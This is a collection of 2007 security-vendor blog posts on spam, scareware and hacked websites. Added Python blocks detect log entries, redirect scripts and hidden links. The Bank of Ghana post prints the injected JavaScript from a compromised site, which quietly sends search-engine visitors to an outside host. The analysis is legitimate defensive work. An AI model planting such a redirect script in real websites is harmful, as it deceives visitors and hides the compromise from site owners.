Must read: The Russian Business Network

For some time, malware researchers around the globe have been tracking the shady work of the Russian Business Network (RBN).

If you wanted to point a finger at one group responsible for a lot of pain on the Internet these days, it’s this outfit.


Brian Krebs at the Washington Post has written a good overview of the RBN.

Article here, with further posts on Brian’s blog here and here.

Alex Eckelberry
(Hat tip to Ferg)

Hoax? Is Alexey Tolstokozhev, spammer, dead?

Who is Alexey Tolstokozhev? According to a post on a website run by “Alex Loonov”, he’s a really bad spammer and he’s been shot.

Wow, just saw this on TV, so I decided to translate this story into English so my readers will be first to learn this. Sorry for mistakes in my English, I’m doing this in a hurry 🙂

Alexey Tolstokozhev (btw, in Russian his name means ‘Thick Skin’), a Russian spammer, was found murdered in his luxury house near Moscow. He had been shot several times, with one bullet stuck in his head. According to authorities, this last head shot is a clear mark of Russian hit men (known as “killers” in Russia).

This is starting to circulate around the net rapidly.

Except I’m not sure it’s true.

Alexey Tolstokozhev doesn’t show up on ROKSO. He doesn’t show up on any web searches. And no one I know in the security industry has ever heard of this guy.

And who is Alex Loonov? Well, his website shows all kinds of archives and looks like it has a lot of material.

Except it was only registered today, at, of all places, the infamous EST Domains.

I smell a hoax.

Alex Eckelberry
(Hat tip to Jose Nazario)

Update: Yup, it’s certainly a hoax.

Update 2:
I wouldn’t encourage visits to this hoax site. There’s no malware on it and you’re not going to get infected. But given where this thing is hosted (and the fact that it is tracking visits), why bother? (If you’re seriously paranoid, you might even go so far as to use Tor to anonymize yourself.)

At any rate, here’s the link to the hoax website: loonov(dot)com/russian-viagra-and-penis-enlargement-spammer-murdered(dot)htm

New Scam: Web Spy Shield

This is a new scam, which does a fake scan of your PC off of a web page. Pretty cool to watch — it just makes stuff up.

As Sunbelter Patrick Jordan says:

It installs a toolbar and an exe in a webspyshield folder; however, it is a fake, web-based scam. You have to be connected for it to run, and I would hate to think what anyone may pay to register it, as it is no real software but only a new form of their online scanner scams.

The HijackThis log shows it even hijacks the home page.

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://webspyshield(dot)com/scan.html
O2 - BHO: WebSpyShieldToolBarShower - {DC87418B-0B2C-424E-900D-54F2ECE15B6B} - C:\Program Files\WebSpyShield\WebSpyShield.dll
O3 - Toolbar: WebSpyShield - {E4988DE7-C5DB-4173-96F9-AAC426AF7BCE} - C:\Program Files\WebSpyShield\WebSpyShield.dll
O4 - HKCU\..\Run: [WebSpyShield] C:\Program Files\WebSpyShield\WebSpyShield.exe
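As an added example (not from the post, and not Sunbelt or HijackThis code), here is a small Python parser for the HijackThis line shapes shown above. It pulls the registry key, CLSID and file path out of R0/O2/O3/O4 entries, flags every entry that mentions an indicator string such as "webspyshield", and reports modules registered under more than one hook type, which is exactly what the log above shows: one DLL loaded as both a BHO and a toolbar. The log text is constructed from the four lines above (with the backslashes the page lost restored) plus one benign autorun entry for the parser to ignore; the domain is kept in the page's defanged "(dot)" form.

```python
import re

# Constructed sample log: the four WebSpyShield entries from the post (with the
# backslashes restored) plus one benign O4 autorun line for the parser to ignore.
SAMPLE_LOG = r"""
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://webspyshield(dot)com/scan.html
O2 - BHO: WebSpyShieldToolBarShower - {DC87418B-0B2C-424E-900D-54F2ECE15B6B} - C:\Program Files\WebSpyShield\WebSpyShield.dll
O3 - Toolbar: WebSpyShield - {E4988DE7-C5DB-4173-96F9-AAC426AF7BCE} - C:\Program Files\WebSpyShield\WebSpyShield.dll
O4 - HKCU\..\Run: [WebSpyShield] C:\Program Files\WebSpyShield\WebSpyShield.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
"""

# "<code> - <body>", e.g. "O2 - BHO: ..."; codes are R0-R3, F0-F3, N1-N4, O1-O24.
LINE_RE = re.compile(r"^(?P<code>[RFNO]\d+) - (?P<body>.+)$")
CLSID_RE = re.compile(r"\{[0-9A-Fa-f-]{36}\}")
# O4 bodies look like "HKCU\..\Run: [ValueName] command line"
RUN_RE = re.compile(r"^(?P<hive>.+?):\s*\[(?P<name>[^\]]+)\]\s*(?P<cmd>.*)$")


def parse_hijackthis(text):
    """Turn HijackThis log lines into dicts; lines of an unknown shape are skipped."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        code, body = m.group("code"), m.group("body")
        entry = {"code": code, "body": body}
        if code.startswith("R"):
            # "HKCU\...\Main,Start Page = http://..." -> registry value and its data
            key, _, value = body.partition(" = ")
            entry.update(key=key.strip(), value=value.strip())
        elif code in ("O2", "O3"):
            # "BHO: Name - {CLSID} - path" or "Toolbar: Name - {CLSID} - path"
            parts = [p.strip() for p in body.split(" - ")]
            entry["name"] = parts[0].split(":", 1)[-1].strip()
            clsid = CLSID_RE.search(body)
            entry["clsid"] = clsid.group(0) if clsid else None
            entry["path"] = parts[-1]
        elif code == "O4":
            m4 = RUN_RE.match(body)
            if m4:
                entry.update(hive=m4.group("hive"), name=m4.group("name"), cmd=m4.group("cmd"))
        entries.append(entry)
    return entries


def flag_entries(entries, indicators):
    """Return (code, name-or-key, matched indicators) for entries mentioning any indicator."""
    hits = []
    for e in entries:
        haystack = " ".join(str(v) for v in e.values() if v).lower()
        matched = [i for i in indicators if i.lower() in haystack]
        if matched:
            hits.append((e["code"], e.get("name") or e.get("key"), matched))
    return hits


def shared_modules(entries):
    """Paths registered under more than one hook type, e.g. one DLL as both BHO (O2) and toolbar (O3)."""
    by_path = {}
    for e in entries:
        path = e.get("path") or e.get("cmd")
        if path:
            by_path.setdefault(path.lower(), set()).add(e["code"])
    return {p: codes for p, codes in by_path.items() if len(codes) > 1}


if __name__ == "__main__":
    parsed = parse_hijackthis(SAMPLE_LOG)
    for code, name, matched in flag_entries(parsed, ["webspyshield"]):
        print(f"{code:3} {name}: matched {matched}")
    for path, codes in shared_modules(parsed).items():
        print(f"{path} registered as {sorted(codes)}")
```

On the sample above, flag_entries reports all four WebSpyShield lines and shared_modules reports the single DLL that is both the O2 BHO and the O3 toolbar; the Synaptics autorun is left alone.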


Alex Eckelberry
(Credit to Bharath)

I’m hosting a webinar next week on email archiving

Our new email archiving product, Sunbelt Exchange Archiver, is being released November 5th. I’m holding a webinar to give a preview peek of the product.

Webinar: Powerful Email Archiving for Exchange Made Easy

Join us for a sneak preview of Sunbelt Software’s new Exchange email archiving and compliance solution, Sunbelt Exchange Archiver™, scheduled for release the first week in November.

If you need a powerful, easy to use, enterprise-class email archiving tool that automatically enables you to comply with all requirements, and allows you or your end-users to transparently retrieve any archived email, then don’t miss this webinar.

The webinar will be hosted by Alex Eckelberry, CEO and Greg Kras, VP of Product Management for Sunbelt Software on Tuesday, October 16th at 2:00pm EDT and will explain the features and benefits of implementing a powerful email archiving solution on your Exchange Server at an affordable price.

Learn how Sunbelt Exchange Archiver can help you:

  • Improve Exchange performance
  • Eliminate PST headaches
  • Dramatically reduce backup times
  • Use up to 80% smaller message store
  • Meet compliance requirements
  • And more

When: Tuesday, October 16, 2007 2:00 PM EDT

To register for this event click here.

I’m actually quite excited about this release. This is a really, really good tool for archiving emails for security, compliance and performance purposes.

Alex Eckelberry

Sunbelt Weekly TechTips #62

How to make custom toolbars out of folders
One way to make a custom toolbar in XP or Vista is to use the New Toolbar selection when you right click the taskbar. Then you can browse to a folder and turn it into a toolbar. However, if you have multiple monitors, you may in some cases have trouble docking these new toolbars on your secondary monitors. Here’s another way that will overcome that problem.

  1. Right click the desktop, select New and then Folder.
  2. Name the new folder whatever you want your new toolbar to be.
  3. Now drag shortcuts for the applications or files you want to access with the toolbar into the new folder.
  4. Drag the folder onto the monitor where you want to dock the new toolbar, if it isn’t there already.
  5. Now just drag the folder to any side of the screen (except the one that drags it off screen to another monitor). This will create a toolbar there with the contents of the folder.
  6. Right click an empty spot on the new toolbar to change the size of the icons, configure whether or not to include text with the icons, etc.

You can put any kind of file or program on these toolbars. For example, I created a toolbar that holds shortcuts to each computer on my network. You can see screenshots of these custom toolbars on my blog site.

Where are Vista system restore files?
QUESTION:
Just a short question. Hope you can answer it for me. Where can I find the system restore files in Vista? Thank you. — Ken K

ANSWER: The file filter driver that System Restore used in XP and earlier versions of Windows is replaced in Vista by the Volume Shadow Copy Service. Now, when you create a restore point, a shadow copy of the volume is taken; a shadow copy is essentially a snapshot of the files and folders on that volume at a specific point in time. Windows Vista can create restore points automatically, or do so when you ask. When the system needs to be restored, files and settings are copied from the shadow copy back to the live volume. To find shadow copies for a particular file, navigate to that file in Windows Explorer, right click it and select Properties. Then click the Previous Versions tab. Here you’ll see the shadow copies that have been saved on the hard disk and the date when each was created. To find the actual location of the copy, right click it, select Properties, and look at the Location field on the General tab. See the screenshots of this here.

How to log onto XP if you forgot your password redux: In our last TechTips, we wrote about how to log on to XP if you forgot your password. Reader Angus Scott-Fleming writes: “Have you seen or used this? I have, it works as advertised, allowing you to boot from a CD and reset any local Windows NT/2000/XP user’s password: Link here.”

WGA validation no longer required to download IE 7
Microsoft has changed their policy on downloading Internet Explorer 7. Now all XP users can upgrade to the newest version of the browser – without going through the “Windows Genuine Advantage” validation process to verify that you aren’t running a pirated copy of the operating system. Is this a trend? Will the company back off the annoying (even to those with a genuine OS) WGA validation requirement for other downloads? We don’t know, but it seems like a step in the right direction. Read about it here.

Vista: What’s that power button on the Start menu for?
Vista gives you plenty of options when it comes to shutting down your computer. At the lower right of the Start menu, you’ll see three buttons: a Power button, a lock button and a right arrow button. Clicking the right arrow gives you all the usual choices: switch user, log off, lock, restart, sleep, hibernate and shut down. Clicking the lock button gives you a fast way to lock the computer. Clicking the Power button will save your work and programs as they are and put the computer into sleep mode or, if it’s a portable computer and the battery is low, this will save your work to the hard disk and turn it off. See a screenshot of these buttons here.

IE home page resets to “about:blank” and Defender quits
If you suddenly find that your home page has been reset to “about:blank” and Windows Defender unexpectedly quits, take action quickly. This can mean that your computer has been infected with the Win32/Banker Trojan, and it’s an ugly one because it collects personal information when you visit online banking sites. To find out more, see KB article 894269.

Troubleshoot problems with reading CDs and DVDs
If your Windows XP computer is unable to read a CD or DVD, it can be due to any of several causes. KB article 321641 provides troubleshooting guidelines to help you determine what the problem is and how to resolve it.

Automatic updates cause Svchost.exe issues
When you use Microsoft Update to scan for or apply updates that use Windows Installer 3.1, you may find that CPU usage goes up to 100% and the computer stops responding and/or you get an access violation error related to the svchost.exe process. If this is happening to you, check out KB article 932494.

Deb Shinder

New hero: Ian Rogers

Yahoo guy Ian Rogers skateboards (something I used to do until fairly recently, when a broken rib made me realize my age) and used to tour with the Beastie Boys.

Ok, so that makes him generally cool. But his anti-DRM rant to music industry folks is downright inspiring.


I’m here to tell you today that I for one am no longer going to fall into this trap. If the licensing labels offer their content to Yahoo! put more barriers in front of the users, I’m not interested. Do what you feel you need to do for your business, I’ll be polite, say thank you, and decline to sign. I won’t let Yahoo! invest any more money in consumer inconvenience. I will tell Yahoo! to give the money they were going to give me to build awesome media applications to Yahoo! Mail or Answers or some other deserving endeavor. I personally don’t have any more time to give and can’t bear to see any more money spent on pathetic attempts for control instead of building consumer value. Life’s too short. I want to delight consumers, not bum them out.

If, on the other hand, you’ve seen the light too, there’s a very fun road ahead for us all. Let’s get beyond talking about how you get the music and into building context: reasons and ways to experience the music. The opportunity is in the chasm between the way we experience the content and the incredible user-created context of the Web.

Lots more here.

Ok, so time for me to rant:

Back in the 80s, I started my professional career at a company called Borland, one of the great success stories of the early microcomputer software business. (While Borland is still around, it’s not nearly the same company as it was, now having moved to Austin, TX from laid-back Santa Cruz, CA and ventured into software for quality assurance testing. Quite different so I can’t speak to the current culture.)

Philippe Kahn, the CEO of Borland, had a very simple philosophy, which molded a lot of my subsequent thinking and practice as I moved forward in the industry.

The philosophy was:

1. No copy protection.
2. Users agreed to a simple “no-nonsense” license agreement, which simply stated that “software was like a book”, and was written in something close to readable English.
3. If you didn’t like the software, you could get your money back (incidentally, the return rate was negligible).
4. Products were priced affordably (and this was the linchpin of the whole philosophy).

Simple concepts. But the world was different back then. A lot of people in the business now don’t know how bad things were. But here’s the contrast:

1. Software was copy protected and it was a PAIN. An entire company, Central Point Software, was built around a product called Copy II PC, which allowed you to break copy protection. And even if you were the legal owner of a software program, you still wanted to break the copy protection, so you could actually use the product.
2. License agreements were horribly complex.
3. You couldn’t get a refund if you weren’t satisfied.
4. Software was outrageously expensive.

By doing what he did, Kahn helped boom the business. Many people got started in programming with Turbo Pascal, Borland’s first product. You could actually afford it: it was 50 bucks. Microsoft’s Pascal was something like $500 at the time. The company went on to launch a number of other products, but then got bogged down in some bad acquisitions and subsequently got murdered by Microsoft’s pricing strategies for MS Office. (More on that whole story another time.)

To me, Kahn’s philosophy was completely logical. If you made something people wanted that was affordable, people would buy it and they wouldn’t pirate. And by showing the user respect, and not treating everyone like a dishonest scumbag, guess what: You get more honest users.

And so now we come to DRM. It’s as if no one ever learned from our early mistakes.

Here’s what’s going to happen:

1. If it’s not stopped, DRM will continue to get more and more complex, with more and more hardware and software interaction, in order to beat the constant stream of people breaking DRM. This will end up breaking applications and the computers themselves. Complexity built upon complexity results in disaster.

2. Hackers will continue to beat the system and so the cycle will continue, getting more and more complex. See 1 above.

3. Some enterprising person will come along and introduce “DRM free” music/videos/games or what have you, and take the market by storm.

The most you want in a licensing control system is “enough to keep the innocent honest”. Such is the case with registration keys for software products — the honest person will pay the registration fee. The dishonest person will always break it. But when you build a system to stop all possibilities of dishonesty, it almost seems that you are building a system based on the logic that “all people are dishonest”, which has as its corollary, “guilty until proven innocent” — in essence, building a system around proving a negative.

Let’s hope that we can create a simple framework for both artists (who really just want to share their creativity with others while getting fairly recompensed) and users to benefit. If we can relieve the system of the DRM virus, it will flow freely and grow.

Alex Eckelberry
(Hat tip)

Mystery: I’m curious to know the back-story behind this…

Odd little post by a Michigan ABC affiliate:

We understand that inappropriate advertisements are appearing on a small number of user computers on Web sites across the Internet, including abc12.com.

The source seems to be Spyware. Some web users may have inadvertently installed Spyware (commonly known as Zango or other third party Spyware) without knowing it by viewing a video from a disreputable Web site, playing a game or downloading an application such as icons, smiley faces or other software.

When users with infected computers search Web sites, inappropriate and unapproved ads may appear within normal advertising space without anyone’s control and no revenue associated.

We want to reassure those who may have seen inappropriate ads on abc12.com that these ads are not coming from us.

Link here. [Update: They have now changed the text.]

Alex Eckelberry

Businesses to spend more on security as a percentage of budget

Here’s a nice, self-serving press release for me to post:

Spending on security technology, training, assessments, and certification now accounts for one-fifth of total technology budgets, according to research from the Computing Technology Industry Association (CompTIA).

A survey of 1,070 organizations found that on average, they spent 20 percent of their total technology budget in 2006 on security-related expenses. That’s up from 15 percent in 2005, and 12 percent in 2004.

Organizations also expect to increase spending across all areas related to security in the next 12 months. Nearly one-half of respondents to the CompTIA survey said they intend to increase spending on security-related technologies; and one-third of respondents expect to increase spending on security training. Among those expecting to increase spending, the average increase is in the range of 19-23 percent, regardless of area.

The survey also showed that for each dollar spent on security, about 42 cents is allocated for technology product purchases; 17 cents for security-related processes; 15 cents for training; 12 cents for assessments; 9 cents for certification; and the balance on other items.

Antivirus software, firewalls and proxy servers continue to be the top technologies for security enforcement, utilized by nearly all organizations. The past two years have seen a significant increase in the use of multiple security enforcement technologies to combat attacks, including firewalls, proxy servers, intrusion detection systems, physical access control, multi-factor authentication, and other technologies.


Release here.

Alex Eckelberry

Comedy of errors: Marin County still serving malware-pushing porn.

Ed Dickson, a fellow blogger, noted today that the now-infamous Marin County Transportation Authority website was still serving porn.

Nah, I knew that stuff might be showing up in the Google cache, but as far as I knew as of Friday, it was clean. So I figured I’d do a quick check for myself.

I was a bit surprised to find out he was right. The Marin County website is back to happily serving porn, after all that’s happened.

A simple Google search using the search term “porn sex site:tam.ca.gov” shows the results.


Some pretty rough stuff, I might add…


And attempts to get you to install malware…


I admit, at this point I feel pretty sorry for these folks.

Let’s hope the government’s peeps don’t try and shut down teh internets again.

Alex Eckelberry

Random: Some Vista adoption numbers

Thought I’d share these numbers with you.

Client agent OS usage by CounterSpy Enterprise:

Windows XP 82.91%
Windows 2000 14.88%
Server 2003 1.83%
Vista build 6000 0.32%
Windows 98 0.03%
Windows NT 4 0.02%
Vista build 5744 0.00%
Vista build 5600 0.00%
Vista build 6001 0.00%
Windows ME 0.00%

This is a sampling of what operating system CounterSpy Enterprise agents deployed at customer sites report back. In this particular sampling, the bias will be toward small to medium business, and shows a very slow adoption of Vista in business environments.

Now, what our website sees:

Windows XP 83.90%
Vista 9.38%
Windows 2000 3.59%
Server 2003 1.62%
Windows 98 1.33%
Windows ME 0.14%
Windows NT 0.02%
Windows 95 0.02%

These are the operating system versions as reported by the browser to our main website. This would reflect a mix of more general usage — consumers and business.

I’d be curious to know what others are seeing out there as well.

Alex Eckelberry
Update: Panda gives their take here.

Bank of Ghana, others, compromised

The Bank of Ghana is serving porn.

A Yahoo search brings up some startling results (thumbnailed due to highly graphic content):


Narrowing down the search a wee bit:


Ouch, nasty stuff.

These pages redirect to porn (graphic content).


The code checks the referrer for visits arriving from search engines, and only then redirects. Example:

http://rainbowdisplays(dot)com/xxxxx/fetish(dot)js

function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("comcast.")!=-1)t="q";
if(r.indexOf("bellsouth.")!=-1)t="string";
if(r.indexOf("netscape.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(r.indexOf("peoplepc.")!=-1)t="q";
if(r.indexOf("starware.")!=-1)t="qry";
if(r.indexOf("earthlink.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location=("http://grandsupport(dot)net/td/in(dot)cgi?13&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=fetish");
}window.onFocus = f()

This sends search-engine visitors off to grandsupport(dot)net, while anyone who types the URL directly (or an administrator checking the site) sees the normal page.
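Two things about that script are worth spelling out for anyone checking a site of their own: the last “if” only fires when the referrer both names a search engine and carries that engine’s query parameter (so typing the URL in by hand never triggers it), and the closing line “window.onFocus = f()” actually calls f() at load time and assigns its result, rather than registering a handler. As an added example (not from the post, and not the attacker’s code), here is a Python script that extracts that engine/parameter table and the redirect target from a page’s JavaScript statically, flags the pattern, and replays the script’s decision for a given Referer value so you can confirm cloaking without visiting the redirect. The JavaScript it parses is a shortened, straight-quoted copy of the snippet above, with the target kept in the page’s defanged “(dot)” form; the benign snippet is constructed for comparison.

```python
import re

# Constructed sample: a shortened copy of the referrer-cloaking function from the
# post (straight quotes, and the "||" that the page's copy had lost), with the
# redirect target kept in the page's defanged "(dot)" form.
SAMPLE_JS = r'''
function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location=("http://grandsupport(dot)net/td/in(dot)cgi?13&seoref="+encodeURIComponent(document.referrer));
}window.onFocus = f()
'''

# Benign referrer use for comparison (constructed): reads the referrer, never redirects.
BENIGN_JS = 'var r = document.referrer; if (r.indexOf("google.") != -1) console.log("from google");'

# r.indexOf("<engine>")!=-1)t="<query param>"  ->  (engine, param) pairs
ENGINE_RE = re.compile(r'\.indexOf\("([^"]+)"\)\s*!=\s*-1\)\s*t\s*=\s*"([^"]*)"')
# first string literal assigned to (window.)location(.href)
TARGET_RE = re.compile(r'(?:window\.)?location(?:\.href)?\s*=\s*\(?\s*"([^"]+)"')


def extract_cloaking_table(js):
    """Static extraction: which engines the script sniffs for, the query
    parameter it expects for each, and where it sends matching visitors."""
    target = TARGET_RE.search(js)
    return {
        "uses_referrer": "document.referrer" in js,
        "engines": dict(ENGINE_RE.findall(js)),  # insertion order = order of the ifs
        "target": target.group(1) if target else None,
    }


def is_referrer_cloaking(js):
    """Heuristic: referrer is read, several engines are matched, and a redirect target exists."""
    t = extract_cloaking_table(js)
    return t["uses_referrer"] and len(t["engines"]) >= 2 and t["target"] is not None


def would_redirect(js, referrer):
    """Replay the script's decision for a given Referer value without running it.
    Mirrors the original logic: a later engine match overrides an earlier one, and
    the referrer must carry that engine's query parameter as ?param= or &param=."""
    t = extract_cloaking_table(js)
    if not t["uses_referrer"] or t["target"] is None:
        return False
    param = ""
    for engine, p in t["engines"].items():
        if engine in referrer:
            param = p
    if not param:
        return False
    return ("?" + param + "=") in referrer or ("&" + param + "=") in referrer


if __name__ == "__main__":
    print(extract_cloaking_table(SAMPLE_JS))
    for ref in ("", "http://www.google.com/", "http://www.google.com/search?q=bank+of+ghana"):
        print(repr(ref), "->", "redirect" if would_redirect(SAMPLE_JS, ref) else "real page")
```

Run against a live page you would fetch the HTML and each script it references and feed them to is_referrer_cloaking; the replay function is what tells you that a visit from a Google or Yahoo results page is redirected while a direct visit, or a search-engine homepage without a query string, is not.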

Let’s hope they get this cleaned up soon (we have notified them).

Alex Eckelberry
(Thanks to Sunbelt researcher Adam Thomas for this.)

Yet Another Meaningless iPhone Rant: Apple deserves to lose its place as a phone provider


I was rooting for Apple’s iPhone. I even had my kids watch Jobs’ extraordinary keynote earlier this year.

I was irritated by, but somewhat forgiving of, Apple’s decision to allow only AT&T as a carrier. It was arrogant, but it was also typically Apple, and it was worth overlooking in light of such a cool phone. Even the whole price drop fiasco didn’t bother me that much.

And we all know that after a while, a few people figured out a way to unlock the phone so it would actually work on a phone system they actually want to use (Apple’s stock price even went up when the first hack was announced).

Well, Apple didn’t seem to notice the message being loudly telegraphed to it. Because, as we all know, Apple, in an even more astounding and ridiculous act of audacity, then turned hacked phones temporarily into a brick. This was an act so stupid, it boggles the mind.

In my opinion, they should have no future, as a phone provider. Because they refuse to even contemplate how the phone business works. They decided to create their own playbook, and they are now going to get hit in the head with it.

What’s the playbook for phones? You come out with versions that support both TDMA/CDMA and GSM infrastructures. You partner with a number of phone companies that blow the phone out for cheap in order to get subscribers. You allow your phone (even tacitly) to become unlocked. And if your phone is hot, you sell millions upon millions of them (the RAZR has sold over 100 million units, and Apple has bragging rights on a million phones sold?).

Customers are a precious commodity.

Competition is fierce in this business, and one only has to look at the new Tilt, BlackBerry 9000 and LG Voyager to see the handwriting on the wall (heck, what about the low-priced Palm Centro?). Even Zune is starting to go DRM-free now (at least partially), so those slick iPods may be less interesting by the minute.

Apple’s future as a phone provider is bleak.

I’m disgusted by Apple’s jackanape arrogance, and it’s even more regrettable since they have offerings which I believe are truly valuable and need more adoption. They are doing the same stupid things that nearly killed them as a company back in the late 80s and early 90s with closed systems. As just one example, iTunes is a potential goldmine, and they could focus on getting as many iPhones out there as possible to build a larger market for iTunes (as well as getting other hardware devices to support iTunes), to build content-based recurring revenue streams.

I hope Jobs gets the message: Your customers are everything that ever matters in business.

If you treat your customers like idiots, a terrible thing happens: Nothing.

In other words, you get no customers.

Alex Eckelberry

Brookhaven National Labs hacked, serving porn

One example:

www.star.bnl.gov/STAR/html/tmp/pub/effplots/virgin(dot)html


And there’s plenty more.

Now, the national security of our country is not at risk (as far as we know). These are just porn redirects coming off of places in Brookhaven’s site.

Alex Eckelberry
(Brookhaven has been contacted and they are taking these down right away.)

Marin County safe, but still not clean…and we found another hacked ca.gov website

Despite all the hullabaloo, the now-infamous Marin County TAM website, responsible for a federal shutdown of ca.gov sites, is still not completely clean. While it’s not redirecting to malware or porn anymore, it still has some dirt underneath the fingernails.

You can play your own version of Find Waldo with this: Go to the site, view source and find the hacked links… (need a hint?).

You can also see that their junk is still showing up on Google.


(These links are both dead, but still show up in Google searches).
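If you want to skip the Find Waldo step, the injected links in cases like this are almost always kept out of sight with an inline style (display:none, visibility:hidden, a zero font size, or a large negative offset) and carry the usual pharmacy and porn anchor text. As an added example (not from the post, and not a Sunbelt tool), here is a Python scanner built on the standard library’s HTMLParser that walks the page’s view-source, tracks whether the current element sits inside a hidden ancestor, and reports every link that is hidden or has spam keywords in its text. The HTML is constructed for the example, with hosts under example.invalid; the keyword list is a heuristic and will produce some noise on real pages.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: two legitimate navigation links, a display:none block of
# injected pharmacy/porn links, and one link pushed off-screen with a negative offset.
SAMPLE_HTML = """<html><body>
<a href="/about.html">About TAM</a>
<div style="display:none">
  <a href="http://example.invalid/buy-viagra">buy viagra online</a>
  <a href="http://example.invalid/porn-sex">porn sex</a>
</div>
<p style="position:absolute; left:-9999px"><a href="http://example.invalid/casino">online casino</a></p>
<a href="/contact.html">Contact</a>
</body></html>"""

# Inline styles that keep an element out of view: the usual SEO-spam hiding tricks.
HIDDEN_STYLE_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?:px|pt|em)?\s*(?:;|$)"
    r"|(?:left|top|text-indent)\s*:\s*-\d{3,}px",
    re.I,
)
# Anchor-text keywords typical of injected links; a heuristic, so expect some noise.
SPAM_WORDS = ("viagra", "cialis", "phentermine", "porn", "sex", "casino", "poker")


class HiddenLinkFinder(HTMLParser):
    """Collect <a href> elements that are hidden by an ancestor's style or carry spam text."""

    def __init__(self):
        super().__init__()
        self.stack = []          # (tag, started_hidden_region) for each open element
        self.hidden_depth = 0    # > 0 while inside any hidden element
        self.href = None         # href of the <a> currently open, if any
        self.text = []
        self.findings = []       # (href, anchor text, [reasons])

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        hidden = bool(HIDDEN_STYLE_RE.search(attrs.get("style") or ""))
        self.stack.append((tag, hidden))
        if hidden:
            self.hidden_depth += 1
        if tag == "a":
            self.href, self.text = attrs.get("href"), []

    def handle_data(self, data):
        if self.href is not None:
            self.text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self.href is not None:
            text = " ".join("".join(self.text).split())
            reasons = []
            if self.hidden_depth:
                reasons.append("inside hidden element")
            if any(w in text.lower() for w in SPAM_WORDS):
                reasons.append("spam keyword in anchor text")
            if reasons:
                self.findings.append((self.href, text, reasons))
            self.href = None
        # Pop back to the matching open tag; tolerates unclosed void tags like <br>.
        if any(t == tag for t, _ in self.stack):
            while self.stack:
                t, hidden = self.stack.pop()
                if hidden:
                    self.hidden_depth -= 1
                if t == tag:
                    break


def find_hidden_links(html):
    """Return [(href, anchor text, reasons)] for every suspicious link in the page."""
    finder = HiddenLinkFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    for href, text, reasons in find_hidden_links(SAMPLE_HTML):
        print(f"{href}  [{text}]  {'; '.join(reasons)}")
```

Point find_hidden_links at the saved source of a page you suspect and it lists the injected links with the reason each was flagged; the two navigation links in the sample come back clean. Links hidden by an external stylesheet or by script rather than an inline style will not be caught, which is why the Google search above is still a useful second check.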

Ok, so that was fun. But let’s do a little more hunting, shall we?

Using the simple search term sex porn site:ca.gov, we now find that madera.courts.ca.gov has experienced some pwnage of its own:


Going to these pages, we see this:


We find the intersection of jurisprudence and… Viagra!

Just another day in the life of a security company. Something interesting, every day.

Alex Eckelberry
(Thanks to Sunbelt researcher Suzi Turner for the help.)

More on the California government shutdown

Yesterday, we reported on a federal shutdown of “ca.gov” sites to fix a hack.

Well, we have a little more information on this.

It was the Marin County government website that started all of this, something we reported on September 12th.

They were warned. But they didn’t believe the warnings:

Marin officials first learned of the hacker’s use of the site when private online security companies warned that the Web page had been infiltrated.

Steinhauser said she and other staffers at first were suspicious of the online warnings from security firms because they were worried they could be a form of “phishing” used by hackers seeking to hijack Web sites.

Well, here’s some email that Suzi Turner (who works for Sunbelt as a security consultant) sent them on September 12th (she also left them a voice mail):



I had also sent them an email on September 12th:


And I’m pretty darned sure we’re not the only ones who alerted them.

There’s also an SC Mag story this morning, with speculation that this was an iFrame hack. No, actually, it was a DNS hack.

So, was shutting down the entire system overkill? Of course. It was complete overkill. But on the other hand, it’s a wake-up call: Keep your site clean. And for Pete’s sake, please heed the warnings of security researchers when they send you email.

Alex Eckelberry
(thanks to Ferg for his help, and also the numerous unnamed security researchers who helped on this as well.)